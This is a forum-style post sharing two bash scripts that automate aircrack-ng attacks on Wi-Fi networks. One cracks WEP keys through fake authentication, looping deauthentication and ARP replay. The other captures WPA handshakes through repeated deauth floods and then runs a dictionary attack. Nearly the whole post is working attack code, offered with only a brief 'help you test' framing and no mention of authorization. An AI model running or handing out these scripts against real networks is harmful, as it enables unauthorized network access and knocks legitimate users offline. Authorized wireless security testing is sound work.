auto-wep.sh; wpa-hcap.sh

[frog_bong]

We all know that Wired Equivalency Privacy is entirely breakable and that Wireless Protected Access can be broken using a word-list or hash-tables. Here are a couple scripts to HELP you test these things. Make sure aircrack-ng in installed.

#!/bin/bash
##
### Automatic wep-cracking script(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
##  Note: This script will not work 100% of the time, it is merely a way to reduce typing
#
export IFACE
export BSSID
export CHANNEL

### Check for argument
if [ -z $1 ] 
  then echo "Usage: $0 <interface>"
  echo "Set MONITOR mode interface."
  exit
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter Target MAC(optional): "; read CLNTMAC
echo "Starting auto-wep.sh with these parameters: "
echo "   Interface: $IFACE"; sleep 1
echo "       BSSID: $BSSID"; sleep 1
echo "     Channel: $CHANNEL"; sleep 1

### Start wep cracking process using components of aircrack-ng in the background (&)
# Start airodump-ng
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" &

# Start aireplay-ng for fake auth. 
sleep 3
xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" &

# Wait for fake association before deauth.
sleep 5
xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; sleep 10; done" &

# Start aireplay-ng for ARP replay
xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" &

# Start cracking .cap file after giving some time to generate initialization vectors(iv's)
sleep 60
sudo aircrack-ng AUTO-WEP*.cap

#!/bin/bash
##
### Script to help capture wpa-handshake(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
##
#

export IFACE 
export BSSID
export CHANNEL
export TIME # time between deauth. broadcast
export CLIENT # client to deauth. (optional)

### Check for argument
if [ -z $1 ] 
  then echo "Usage: $0 <interface>"
  echo "Set MONITOR mode interface."
  exit
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID 
echo "Enter AP Channel: "; read CHANNEL
echo "Enter deauth. delay: "; read TIME 
echo "Enter client(optional): "; read CLIENT
echo "Starting $0 with these parameters: "
echo "   Interface: $IFACE"; sleep 1
echo "       BSSID: $BSSID"; sleep 1
echo "     Channel: $CHANNEL"; sleep 1
echo "  Time Delay: $TIME"; sleep 1

if [ "$CLIENT" != "" ]
  then echo "      Client: $CLIENT"; sleep 1
fi

### Start capture and regular deauth.
# Start airodump-ng to capture handshake
sudo  xterm -e "airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" &

# Start deauth every 20 minutes
sleep 3 # wait for airodump to startup

if [ "$CLIENT" != "" ] 
  then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" &
fi

if [ "$CLIENT" = "" ]
  then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" &
fi

# Start aircrack-ng in wpa mode to parse the .cap file for handshakes
while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done